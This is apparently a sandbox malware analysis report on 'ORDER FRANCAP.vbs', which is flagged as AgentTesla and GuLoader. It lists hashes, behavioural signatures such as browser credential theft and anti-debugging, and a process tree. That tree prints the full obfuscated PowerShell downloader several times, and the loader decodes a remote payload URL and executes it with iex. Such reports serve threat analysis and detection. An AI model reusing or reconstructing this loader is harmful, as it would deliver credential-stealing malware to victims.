Overview

overview

10

Static

static

1

ORDER FRANCAP.vbs

windows7-x64

10

ORDER FRANCAP.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 14:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ORDER FRANCAP.vbs

  • Size

    19KB

  • MD5

    eba1187e17a501a2f3d094a4250d3f8d

  • SHA1

    b4464bd1ee76a5193d3968ab655923b6489dd330

  • SHA256

    b03739cf9980db3787fffa12278cf821bebade2d5a30f84fb6d539cbc9d38bae

  • SHA512

    de75e7cea75ef546580cfe75e38ac09977d68a5f96427b109a56b612f46da537ac7b6ae379f9dfb073a50815ae553a52bf6c1ad323aefbb0b82c40a550b221d5

  • SSDEEP

    384:sQ3GOmBsxCn5h5adn877H6xfpG5a6nfJYhZedNMWn2ck2S5p:Z39cs85h5knImnsa6nRY4tQp

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDER FRANCAP.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml SpioFeribBr.ga,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr .Ug.is Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno sHoof2Ofre0Mars0S.at. ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK D.gr afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stolemageren.Luf && echo t"
        3⤵
          PID:3024
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml SpioFeribBr.ga,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr .Ug.is Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno sHoof2Ofre0Mars0S.at. ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK D.gr afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml SpioFeribBr.ga,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr .Ug.is Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno sHoof2Ofre0Mars0S.at. ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK D.gr afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2724
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stolemageren.Luf && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
